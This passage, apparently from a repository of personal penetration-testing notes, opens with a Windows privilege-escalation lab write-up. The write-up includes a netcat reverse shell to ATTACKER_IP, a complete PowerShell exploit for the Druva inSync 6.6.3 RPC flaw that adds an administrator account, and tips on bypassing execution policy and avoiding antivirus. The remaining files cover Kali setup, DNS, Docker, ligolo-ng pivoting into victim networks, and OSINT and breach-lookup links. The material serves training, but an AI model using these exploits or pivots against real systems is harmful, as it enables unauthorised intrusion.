unresponsive for a bit. This happens if you run the exploit multiple times as it must wait for the BITS service to stop before starting it again. The BITS service will stop automatically after 2 minutes of starting. 751 | 752 | The `-p` parameter specifies the executable to be run by the exploit, which is `nc64.exe` in this case. The `-a` parameter is used to pass arguments to the executable. Since we want nc64 to establish a reverse shell against our attacker machine, the arguments to pass to netcat will be `-e cmd.exe ATTACKER_IP 4442`. 753 | 754 | If all was correctly set up, you should expect a shell with SYSTEM privileges: 755 | 756 | Kali Linux 757 | 758 | ``` 759 | user@attackerpc$ nc -lvp 4442 760 | Listening on 0.0.0.0 4442 761 | Connection received on 10.10.175.90 49755 762 | Microsoft Windows [Version 10.0.17763.1821] 763 | (c) 2018 Microsoft Corporation. All rights reserved. 764 | 765 | c:\windows\system32\inetsrv>whoami 766 | nt authority\system 767 | ``` 768 | 769 | Using any of the three methods discussed in this task, gain access to the Administrator's desktop and collect the flag. Don't forget to input the flag at the end of this task. 770 | 771 | # Abusing vulnerable software 772 | 773 | ## Unpatched Software 774 | 775 | Software installed on the target system can present various privilege escalation opportunities. As with drivers, organisations and users may not update them as often as they update the operating system. You can use the `wmic` tool to list software installed on the target system and its versions. The command below will dump information it can gather on installed software (it might take around a minute to finish): 776 | 777 | ``` 778 | wmic product get name,version,vendor 779 | ``` 780 | 781 | Remember that the `wmic product` command may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here. It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable. 782 | 783 | Once we have gathered product version information, we can always search for existing exploits on the installed software online on sites like [exploit-db](https://www.exploit-db.com/), [packet storm](https://packetstormsecurity.com/) or plain old [Google](https://www.google.com/), amongst many others. 784 | 785 | Using wmic and Google, can you find a known vulnerability on any installed product? 786 | 787 | ## Case Study: Druva inSync 6.6.3 788 | 789 | The target server is running Druva inSync 6.6.3, which is vulnerable to privilege escalation as reported by [Matteo Malvica](https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/). The vulnerability results from a bad patch applied over another vulnerability reported initially for version 6.5.0 by [Chris Lyne](https://www.tenable.com/security/research/tra-2020-12). 790 | 791 | The software is vulnerable because it runs an RPC (Remote Procedure Call) server on port 6064 with SYSTEM privileges, accessible from localhost only. If you aren't familiar with RPC, it is simply a mechanism that allows a given process to expose functions (called procedures in RPC lingo) over the network so that other machines can call them remotely. 792 | 793 | In the case of Druva inSync, one of the procedures exposed (specifically procedure number 5) on port 6064 allowed anyone to request the execution of any command. Since the RPC server runs as SYSTEM, any command gets executed with SYSTEM privileges. 794 | 795 | The original vulnerability reported on versions 6.5.0 and prior allowed any command to be run without restrictions. The original idea behind providing such functionality was to remotely execute some specific binaries provided with inSync, rather than any command. Still, no check was made to make sure of that. 796 | 797 | A patch was issued, where they decided to check that the executed command started with the string `C:\ProgramData\Druva\inSync4\`, where the allowed binaries were supposed to be. But then, this proved insufficient since you could simply make a path traversal attack to bypass this kind of control. Suppose that you want to execute `C:\Windows\System32\cmd.exe`, which is not in the allowed path; you could simply ask the server to run `C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe` and that would bypass the check successfully. 798 | 799 | To put together a working exploit, we need to understand how to talk to port 6064. Luckily for us, the protocol in use is straightforward, and the packets to be sent are depicted in the following diagram: 800 | 801 | ![Druva Exploit Diagram](images/ff706d6530426d3123c0983acd61f934.png) 802 | 803 | The first packet is simply a hello packet that contains a fixed string. The second packet indicates that we want to execute procedure number 5, as this is the vulnerable procedure that will execute any command for us. The last two packets are used to send the length of the command and the command string to be executed, respectively. 804 | 805 | Initially published by Matteo Malvica [here](https://packetstormsecurity.com/files/160404/Druva-inSync-Windows-Client-6.6.3-Privilege-Escalation.html), the following exploit can be used in your target machine to elevate privileges and retrieve this task's flag. For your convenience, here is the original exploit's code: 806 | 807 | ``` 808 | $ErrorActionPreference = "Stop" 809 | 810 | $cmd = "net user pwnd /add" 811 | 812 | $s = New-Object System.Net.Sockets.Socket( 813 | [System.Net.Sockets.AddressFamily]::InterNetwork, 814 | [System.Net.Sockets.SocketType]::Stream, 815 | [System.Net.Sockets.ProtocolType]::Tcp 816 | ) 817 | $s.Connect("127.0.0.1", 6064) 818 | 819 | $header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") 820 | $rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") 821 | $command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); 822 | $length = [System.BitConverter]::GetBytes($command.Length); 823 | 824 | $s.Send($header) 825 | $s.Send($rpcType) 826 | $s.Send($length) 827 | $s.Send($command) 828 | ``` 829 | 830 | You can pop a Powershell console and paste the exploit directly to execute it (The exploit is also available in the target machine at `C:\tools\Druva_inSync_exploit.txt`). Note that the exploit's default payload, specified in the `$cmd` variable, will create a user named `pwnd` in the system, but won't assign him administrative privileges, so we will probably want to change the payload for something more useful. For this room, we will change the payload to run the following command: 831 | 832 | ``` 833 | net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add 834 | ``` 835 | 836 | This will create user `pwnd` with a password of `SimplePass123` and add it to the administrators' group. If the exploit was successful, you should be able to run the following command to verify that the user `pwnd` exists and is part of the administrators' group: 837 | 838 | ``` 839 | PS C:\> net user pwnd 840 | User name pwnd 841 | Full Name 842 | Account active Yes 843 | [...] 844 | 845 | Local Group Memberships *Administrators *Users 846 | Global Group memberships *None 847 | ``` 848 | 849 | As a last step, you can run a command prompt as administrator: 850 | 851 | ![Run Command Prompt as Pwnd](images/bbd0af143c9a9b31c1acce32fabfdc0f.png) 852 | 853 | When prompted for credentials, use the `pwnd` account. From the new command prompt, you can retrieve your flag from the Administrator's desktop with the following command `type C:\Users\Administrator\Desktop\flag.txt`. 854 | 855 | # Tools of the Trade 856 | Several scripts exist to conduct system enumeration in ways similar to the ones seen in the previous task. These tools can shorten the enumeration process time and uncover different potential privilege escalation vectors. However, please remember that automated tools can sometimes miss privilege escalation. 857 | 858 | Below are a few tools commonly used to identify privilege escalation vectors. Feel free to run them against any of the machines in this room and see if the results match the discussed attack vectors. 859 | 860 | ## WinPEAS 861 | 862 | WinPEAS is a script developed to enumerate the target system to uncover privilege escalation paths. You can find more information about winPEAS and download either the precompiled executable or a .bat script. WinPEAS will run commands similar to the ones listed in the previous task and print their output. The output from winPEAS can be lengthy and sometimes difficult to read. This is why it would be good practice to always redirect the output to a file, as shown below: 863 | 864 | Command Prompt 865 | 866 | ``` 867 | C:\> winpeas.exe > outputfile.txt 868 | ``` 869 | 870 | WinPEAS can be downloaded [here](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS). 871 | 872 | ## PrivescCheck 873 | 874 | PrivescCheck is a PowerShell script that searches common privilege escalation on the target system. It provides an alternative to WinPEAS without requiring the execution of a binary file. 875 | 876 | PrivescCheck can be downloaded [here](https://github.com/itm4n/PrivescCheck). 877 | 878 | Reminder: To run PrivescCheck on the target system, you may need to bypass the execution policy restrictions. To achieve this, you can use the `Set-ExecutionPolicy` cmdlet as shown below. 879 | 880 | Powershell 881 | 882 | ``` 883 | PS C:\> Set-ExecutionPolicy Bypass -Scope process -Force 884 | PS C:\> . .\PrivescCheck.ps1 885 | PS C:\> Invoke-PrivescCheck 886 | ``` 887 | 888 | ## WES-NG: Windows Exploit Suggester - Next Generation 889 | 890 | Some exploit suggesting scripts (e.g. winPEAS) will require you to upload them to the target system and run them there. This may cause antivirus software to detect and delete them. To avoid making unnecessary noise that can attract attention, you may prefer to use WES-NG, which will run on your attacking machine. 891 | 892 | WES-NG is a Python script that can be found and downloaded [here](https://github.com/bitsadmin/wesng). 893 | 894 | Once installed, and before using it, type the  `wes.py --update` command to update the database. The script will refer to the database it creates to check for missing patches that can result in a vulnerability you can use to elevate your privileges on the target system. 895 | 896 | To use the script, you will need to run the `systeminfo` command on the target system. Do not forget to direct the output to a .txt file you will need to move to your attacking machine. 897 | 898 | Once this is done, wes.py can be run as follows; 899 | 900 | Kali Linux 901 | 902 | ``` 903 | user@kali$ wes.py systeminfo.txt 904 | ``` 905 | 906 | ## Metasploit 907 | 908 | If you already have a Meterpreter shell on the target system, you can use the `multi/recon/local_exploit_suggester` module to list vulnerabilities that may affect the target system and allow you to elevate your privileges on the target system. -------------------------------------------------------------------------------- /alpine-mirrors.md: -------------------------------------------------------------------------------- 1 | Create the directory and mirrors file with the following - http://dl-cdn.alpinelinux.org/alpine/MIRRORS.txt 2 | 3 | You may need to run the ./build-alpine a couple of times until it selects and working mirror. 4 | 5 | This was the winner for me - http://mirror.ps.kz/alpine//v3.13/main 6 | 7 | ALPINE MIRRORS 8 | http://dl-cdn.alpinelinux.org/alpine/ 9 | http://uk.alpinelinux.org/alpine/ 10 | http://dl-2.alpinelinux.org/alpine/ 11 | http://dl-4.alpinelinux.org/alpine/ 12 | http://dl-5.alpinelinux.org/alpine/ 13 | http://mirror.yandex.ru/mirrors/alpine/ 14 | http://mirrors.gigenet.com/alpinelinux/ 15 | http://mirror1.hs-esslingen.de/pub/Mirrors/alpine/ 16 | http://mirror.leaseweb.com/alpine/ 17 | http://mirror.fit.cvut.cz/alpine/ 18 | http://alpine.mirror.far.fi/ 19 | http://alpine.mirror.wearetriple.com/ 20 | http://mirror.clarkson.edu/alpine/ 21 | http://linorg.usp.br/AlpineLinux/ 22 | http://ftp.yzu.edu.tw/Linux/alpine/ 23 | http://mirror.aarnet.edu.au/pub/alpine 24 | http://speglar.siminn.is/alpine/ 25 | http://mirrors.dotsrc.org/alpine/ 26 | http://ftp.halifax.rwth-aachen.de/alpine/ 27 | http://mirrors.tuna.tsinghua.edu.cn/alpine/ 28 | http://mirrors.ustc.edu.cn/alpine/ 29 | http://mirrors.xjtu.edu.cn/alpine/ 30 | http://mirrors.nju.edu.cn/alpine/ 31 | http://mirror.lzu.edu.cn/alpine/ 32 | http://ftp.acc.umu.se/mirror/alpinelinux.org/ 33 | http://mirror.xtom.com.hk/alpine/ 34 | http://mirror.csclub.uwaterloo.ca/alpine/ 35 | http://alpinelinux.mirror.iweb.com/ 36 | http://pkg.adfinis.com/alpine/ 37 | http://mirror.ps.kz/alpine/ 38 | http://mirror.rise.ph/alpine-linux/ 39 | http://mirror.operationtulip.com/alpine/ 40 | http://mirrors.ircam.fr/pub/alpine/ 41 | http://alpine.42.fr/ 42 | http://mirror.math.princeton.edu/pub/alpinelinux/ 43 | http://mirrors.sjtug.sjtu.edu.cn/alpine/ 44 | http://ftp.icm.edu.pl/pub/Linux/distributions/alpine/ 45 | http://mirror.ungleich.ch/mirror/packages/alpine/ 46 | http://alpine.mirror.vexxhost.ca/ 47 | http://sjc.edge.kernel.org/alpine/ 48 | http://ewr.edge.kernel.org/alpine/ 49 | http://ams.edge.kernel.org/alpine/ 50 | http://download.nus.edu.sg/mirror/alpine/ 51 | http://alpine.yourlabs.org 52 | http://mirror.pit.teraswitch.com/alpine 53 | http://mirror.reenigne.net/alpine/ 54 | http://quantum-mirror.hu/mirrors/pub/alpine/ 55 | http://tux.rainside.sk/alpine/ 56 | http://alpine.cs.nctu.edu.tw/ 57 | http://mirror.ihost.md/alpine/ 58 | http://mirror.ette.biz/alpine/ 59 | http://mirror.lagoon.nc/alpine/ 60 | http://alpinelinux.c3sl.ufpr.br 61 | http://foobar.turbo.net.id/alpine/ 62 | http://alpine.ccns.ncku.edu.tw -------------------------------------------------------------------------------- /dnsmasq.md: -------------------------------------------------------------------------------- 1 | # DNSMASQ 2 | 3 | ## Install 4 | 5 | With new version of Kali, dnmasq is part of NetworkManager 6 | 7 | If you installed dnsmasq previously, remove it 8 | 9 | ```bash 10 | sudo apt remove dnsmasq 11 | ``` 12 | 13 | - Add `dns=dnsmasq`to /etc/NetworkManager/NetworkManager.conf 14 | ```bash 15 | sudo vi /etc/NetworkManager/NetworkManager.conf 16 | [main] 17 | dns=dnsmasq 18 | plugins=ifupdown,keyfile 19 | 20 | [ifupdown] 21 | managed=false 22 | ``` 23 | 24 | - Create a personal conf file 25 | ```bash 26 | sudo vi /etc/NetworkManager/dnsmasq.d/olivierprotips.conf 27 | server=8.8.8.8 28 | 29 | address=/.quotient.thm/10.10.250.116 30 | ``` 31 | 32 | - Restart NetworkManager service 33 | 34 | ```bash 35 | sudo systemctl restart NetworkManager.service 36 | ``` 37 | 38 | ## Script to add entry (thanks Bigyls) 39 | 40 | > full script is [here](https://github.com/OlivierProTips/kali-resources/blob/master/dnsmasq-update) 41 | 42 | ```bash 43 | #!/bin/bash 44 | 45 | # Usage: ./dnsmasq-update.sh 46 | 47 | if [ "$EUID" -ne 0 ] 48 | then 49 | echo "ERROR: Please run as root" 50 | exit 1 51 | fi 52 | 53 | domain=$1 54 | host=$2 55 | config_path="/etc/NetworkManager/dnsmasq.d/" 56 | dom_array=(`echo $domain | tr '.' '\n'`) 57 | tld=${dom_array[${#dom_array[@]}-1]} 58 | config_file=${config_path}${tld}".conf" 59 | 60 | if [ $# -eq 2 ]; then 61 | 62 | if [ ! -e "$config_file" ]; then 63 | echo "server=8.8.8.8" > "$config_file" 64 | fi 65 | 66 | echo "address=/.${domain}/${host}" >> "$config_file" 67 | systemctl restart NetworkManager.service; 68 | else 69 | echo "ERR: Incorrect arguments."; 70 | exit 1; 71 | fi 72 | ``` 73 | 74 | ## Demo 75 | 76 | ![Alt text](images/dnsmasq.gif) 77 | 78 | ## Troubleshooting 79 | 80 | Sometimes, it can not work. When you ping the hostname, you get no response. 81 | 82 | It is possible this is the fault of `systemd-resolved` 83 | 84 | In newest Kali, this service does not exist anymore, but in old Kali, it is responsible of messing up your `/etc/resolv.conf` 85 | 86 | - Disable systemd-resolved 87 | 88 | ```bash 89 | sudo systemctl disable systemd-resolved.service 90 | sudo systemctl stop systemd-resolved.service 91 | ``` 92 | 93 | - Modify /etc/resolv.conf 94 | 95 | ```bash 96 | nameserver 127.0.0.1 97 | options edns0 trust-ad 98 | ``` -------------------------------------------------------------------------------- /docker.md: -------------------------------------------------------------------------------- 1 | # DOCKER 2 | 3 | ## Delete unsused images 4 | 5 | ```bash 6 | docker system prune 7 | ``` 8 | 9 | ## Delete all images 10 | 11 | ```bash 12 | docker system prune -a 13 | ``` 14 | 15 | ## Images folder 16 | 17 | ```bash 18 | /var/lib/docker/overlay2 19 | ``` 20 | 21 | ## Launch 22 | 23 | ### Install and launch image 24 | 25 | ```bash 26 | sudo docker run it -rm -p 12345:80 -d wordpress 27 | ``` 28 | 29 | * -d: detach (background) 30 | * -rm: delete container when stopped 31 | * -it: interactive mode 32 | 33 | ### List all containers 34 | 35 | ```bash 36 | sudo docker ps -a 37 | ``` 38 | 39 | ### Start / Stop / rm 40 | 41 | ```bash 42 | sudo docker start [id] 43 | sudo docker stop [id] 44 | sudo docker rm [id] 45 | ``` 46 | 47 | ## Docker compose 48 | 49 | ### Update 50 | ```bash 51 | docker-compose pull 52 | docker-compose up -d --remove-orphans 53 | docker image prune 54 | ``` 55 | 56 | ## Synology 57 | 58 | ### Update 59 | 60 | 1. Go to Registry and download new image (mostly the “latest” version) 61 | 2. Go to Container, select the container you need to update and stop it 62 | 3. From Actions menu select “Clear/Reset” 63 | 4. Start the container again -------------------------------------------------------------------------------- /images/006115497113a0a4f03008028dc32fb7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/006115497113a0a4f03008028dc32fb7.png -------------------------------------------------------------------------------- /images/06c05c134e4922ec8ff8d9b56382c58f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/06c05c134e4922ec8ff8d9b56382c58f.png -------------------------------------------------------------------------------- /images/1401bc3dcb1e4eb84f526b95567a5ef8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/1401bc3dcb1e4eb84f526b95567a5ef8.png -------------------------------------------------------------------------------- /images/24545e313a2e5ddee2386a68b4c7adeb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/24545e313a2e5ddee2386a68b4c7adeb.png -------------------------------------------------------------------------------- /images/33303d0cde736589d2838ee894379ff2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/33303d0cde736589d2838ee894379ff2.png -------------------------------------------------------------------------------- /images/4603506a36f4bbda602dc67cdc845d9f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/4603506a36f4bbda602dc67cdc845d9f.png -------------------------------------------------------------------------------- /images/a5437a609e41d982b320967667e9b97a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/a5437a609e41d982b320967667e9b97a.png -------------------------------------------------------------------------------- /images/bbd0af143c9a9b31c1acce32fabfdc0f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/bbd0af143c9a9b31c1acce32fabfdc0f.png -------------------------------------------------------------------------------- /images/befb434f15dbd4deee0654f8b6ef6de0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/befb434f15dbd4deee0654f8b6ef6de0.png -------------------------------------------------------------------------------- /images/c25de66ae7777169d09a61ce2fb38e28.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/c25de66ae7777169d09a61ce2fb38e28.png -------------------------------------------------------------------------------- /images/d8244cfd9d64a7be30f5fb0308fd0806.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/d8244cfd9d64a7be30f5fb0308fd0806.png -------------------------------------------------------------------------------- /images/dd7290ca93369cee33182023cb9190ff.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/dd7290ca93369cee33182023cb9190ff.png -------------------------------------------------------------------------------- /images/dnsmasq.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/dnsmasq.gif -------------------------------------------------------------------------------- /images/ff706d6530426d3123c0983acd61f934.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/ff706d6530426d3123c0983acd61f934.png -------------------------------------------------------------------------------- /images/pwncat.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/pwncat.gif -------------------------------------------------------------------------------- /images/ssti.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/ssti.png -------------------------------------------------------------------------------- /images/terminator_shortcuts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/terminator_shortcuts.png -------------------------------------------------------------------------------- /images/vpnchoice.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/vpnchoice.gif -------------------------------------------------------------------------------- /import_ova_to_pve.md: -------------------------------------------------------------------------------- 1 | # Import OVA to Proxmox 2 | 3 | 1. Extract OVA file in Proxmox Server 4 | 5 | ```bash 6 | tar xvf vmfile.ova 7 | ``` 8 | 9 | 2. Import VM Settings to Proxmox 10 | 11 | ``` 12 | qm importovf 605 ./vmfile.ovf local --format qcow2 13 | ``` 14 | 15 | 3. Remove existing disk from VM 16 | 17 | 4. Import VM Disk (VMDK) to Virtual Machine (VM) 18 | 19 | ``` 20 | qm importdisk 605 vmfile.vmdk local -format qcow2 21 | ``` 22 | 23 | 5. Add disk to VM (double click on it) 24 | 25 | 6. Add Virtual Network Interface 26 | 27 | 7. Add snapshot RESET 28 | -------------------------------------------------------------------------------- /install.md: -------------------------------------------------------------------------------- 1 | 2 | # KALI 3 | 4 | 1. Alias 5 | 6 | ```sh 7 | vi /root/.bash_aliases 8 | 9 | alias ll='ls --color=always -hla' 10 | 11 | function apt-updater { 12 | apt-get update && 13 | apt-get dist-upgrade -Vy && 14 | apt-get autoremove -y && 15 | apt-get autoclean && 16 | apt-get clean && 17 | searchsploit -u #&& 18 | #reboot 19 | } 20 | 21 | function newctf { 22 | _template="/home/kali/Hacks/READMECTF_TEMPLATE.md" 23 | _readme="README.md" 24 | if [[ $# == 1 && -f "${_template}" && ! -d "$1" ]] 25 | then 26 | mkdir $1 27 | cd $1 28 | cp "${_template}" "${_readme}" 29 | sed -i "s/ctfname/$1/" "${_readme}" 30 | subl "${_readme}" 31 | else 32 | if [[ $# != 1 ]] 33 | then 34 | echo "Wrong parameter" 35 | fi 36 | if [[ ! -f "${_template}" ]] 37 | then 38 | echo "${_template} does not exist" 39 | fi 40 | if [[ -d "$1" ]] 41 | then 42 | echo "$1 already exist" 43 | fi 44 | fi 45 | } 46 | ``` 47 | 48 | In `~/.vimrc` 49 | ```sh 50 | source $VIMRUNTIME/defaults.vim 51 | set mouse-=a 52 | ``` 53 | 54 | ```sh 55 | sudo ln -s /home/kali/Hacks/Divers/upload_file_nc.sh /usr/local/bin/upload_file_nc 56 | sudo ln -s /home/kali/Hacks/Divers/upload_file_wget.sh /usr/local/bin/upload_file_wget 57 | ``` 58 | 59 | 2. Terminal 60 | 61 | ```sh 62 | apt install terminator 63 | ``` 64 | 65 | 3. Latest Version of Tor 66 | 67 | ```sh 68 | echo 'deb https://deb.torproject.org/torproject.org stretch main 69 | deb-src https://deb.torproject.org/torproject.org stretch main' > /etc/apt/sources.list.d/tor.list 70 | 71 | wget -O- https://deb.torproject.org/torproject.org/A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89.asc | sudo apt-key add - 72 | 73 | apt-get update 74 | 75 | apt-get install tor deb.torproject.org-keyring 76 | ``` 77 | 78 | 4. SublimeText 79 | 80 | ```sh 81 | wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - 82 | 83 | sudo apt-get install apt-transport-https 84 | 85 | echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list 86 | 87 | sudo apt-get update 88 | 89 | sudo apt-get install sublime-text 90 | ``` 91 | 92 | 5. Change SSH Keys & Default Password 93 | 94 | ```sh 95 | cd /etc/ssh/ 96 | dpkg-reconfigure openssh-server 97 | 98 | passwd root 99 | ``` 100 | 101 | 6. Software 102 | 103 | ```sh 104 | apt install gobuster 105 | 106 | apt install seclists 107 | 108 | apt install terminator 109 | 110 | apt install steghide 111 | 112 | sudo apt install python3-pip 113 | 114 | pip3 install stegcracker 115 | ``` 116 | 117 | get rustscan: https://github.com/RustScan/RustScan/releases 118 | dpkg -i deb_file 119 | 120 | ## Wifite 121 | ```sh 122 | sudo apt install hcxdumptool 123 | sudo apt install hcxtools 124 | ``` 125 | 126 | * Pyrit 127 | 128 | ```sh 129 | sudo apt-get install libpcap-dev 130 | sudo apt-get install python2.7-dev libssl-dev zlib1g-dev libpcap-dev 131 | git clone https://github.com/JPaulMora/Pyrit.git 132 | cd Pyrit 133 | sudo python setup.py clean 134 | sudo python setup.py build 135 | sudo python setup.py install 136 | ``` 137 | ```sh 138 | sudo wifite --wpa --dict file.txt --kill 139 | ``` 140 | 141 | ## VULSCAN 142 | 143 | Install in /usr/share/nmap/scripts/vulscan or /usr/local/share/nmap/scripts/vulscan 144 | ```sh 145 | git clone https://github.com/scipag/vulscan 146 | nmap -sV --script=vulscan/vulscan.nse www.example.com 147 | wget https://www.computec.ch/projekte/vulscan/download/cve.csv 148 | wget https://www.computec.ch/projekte/vulscan/download/exploitdb.csv 149 | wget https://www.computec.ch/projekte/vulscan/download/openvas.csv 150 | wget https://www.computec.ch/projekte/vulscan/download/osvdb.csv 151 | wget https://www.computec.ch/projekte/vulscan/download/scipvuldb.csv 152 | wget https://www.computec.ch/projekte/vulscan/download/securityfocus.csv 153 | wget https://www.computec.ch/projekte/vulscan/download/securitytracker.csv 154 | wget https://www.computec.ch/projekte/vulscan/download/xforce.csv 155 | `` -------------------------------------------------------------------------------- /ligolo.md: -------------------------------------------------------------------------------- 1 | # LIGOLO 2 | 3 | ## Pre-requisite 4 | 5 | ```bash 6 | sudo apt install golang-go 7 | ``` 8 | 9 | ## Install 10 | 11 | ```bash 12 | cd /opt 13 | sudo git clone https://github.com/nicocha30/ligolo-ng 14 | cd ligolo-ng 15 | sudo go build -o agent cmd/agent/main.go 16 | sudo go build -o proxy cmd/proxy/main.go 17 | ``` 18 | 19 | ## Creating a TUN Interface (kali) 20 | 21 | ```bash 22 | sudo ip tuntap add user kali mode tun ligolo 23 | sudo ip link set ligolo up 24 | ``` 25 | 26 | ## Starting the Proxy Server (kali) 27 | 28 | ```bash 29 | cd /opt/ligolo-ng 30 | ./proxy -selfcert 31 | ``` 32 | 33 | ## Agent (victim) 34 | 35 | https://github.com/nicocha30/ligolo-ng/releases 36 | 37 | ```bash 38 | ./agent -connect kali_ip:11601 -ignore-cert & 39 | ``` 40 | 41 | ## Adding a new route on Proxy Server (kali) 42 | 43 | ```bash 44 | sudo ip route add ip_to_reach_on_victim/24 dev ligolo 45 | ``` 46 | 47 | ## Start session (kali/proxy) 48 | 49 | - Type `session` 50 | - Select the session 51 | - Type `start` 52 | 53 | ## Double Pivot 54 | 55 | ### Creating a Listener (kali/proxy) 56 | 57 | In the session 58 | 59 | ```bash 60 | listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp 61 | listener_list 62 | ``` 63 | 64 | ### Connect Double Pivot box to Proxy Server (victim 2) 65 | 66 | ```bash 67 | ./agent.exe -connect 2nd_ip_of_victim_1:11601 -ignore-cert & 68 | ``` 69 | 70 | ### Adding a new route on Proxy Server (kali) 71 | 72 | ```bash 73 | sudo ip route add ip_to_reach_on_victim_2/24 dev ligolo 74 | ``` -------------------------------------------------------------------------------- /osint.txt: -------------------------------------------------------------------------------- 1 | https://whatsmyname.app/ 2 | https://namecheckup.com/ 3 | https://github.com/WebBreacher/WhatsMyName 4 | https://github.com/sherlock-project/sherlock 5 | https://scylla.sh/api 6 | https://www.dehashed.com/ -------------------------------------------------------------------------------- /pwncat-cs.md: -------------------------------------------------------------------------------- 1 | # Install pwncat-cs on Kali with python >= 3.12 2 | 3 | ```bash 4 | sudo apt update 5 | sudo apt install build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev curl git libncursesw5-dev xz-utils tk-dev libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev -y 6 | sudo apt install python3 python3-pip -y 7 | ``` 8 | 9 | ```bash 10 | curl https://pyenv.run | bash 11 | ``` 12 | 13 | ```bash 14 | cat <<'EOF' >> ~/.bashrc 15 | export PATH="${HOME}/.pyenv/bin:$PATH" 16 | eval "$(pyenv init -)" 17 | eval "$(pyenv virtualenv-init -)" 18 | EOF 19 | source ~/.bashrc 20 | ``` 21 | 22 | ```bash 23 | pyenv install 3.11.0 24 | ``` 25 | 26 | ```bash 27 | pyenv virtualenv 3.11.0 pwncat-cs 28 | ``` 29 | 30 | ```bash 31 | pyenv activate pwncat-cs 32 | ``` 33 | 34 | ```bash 35 | pip install pwncat-cs 36 | ``` --------------------------------------------------------------------------------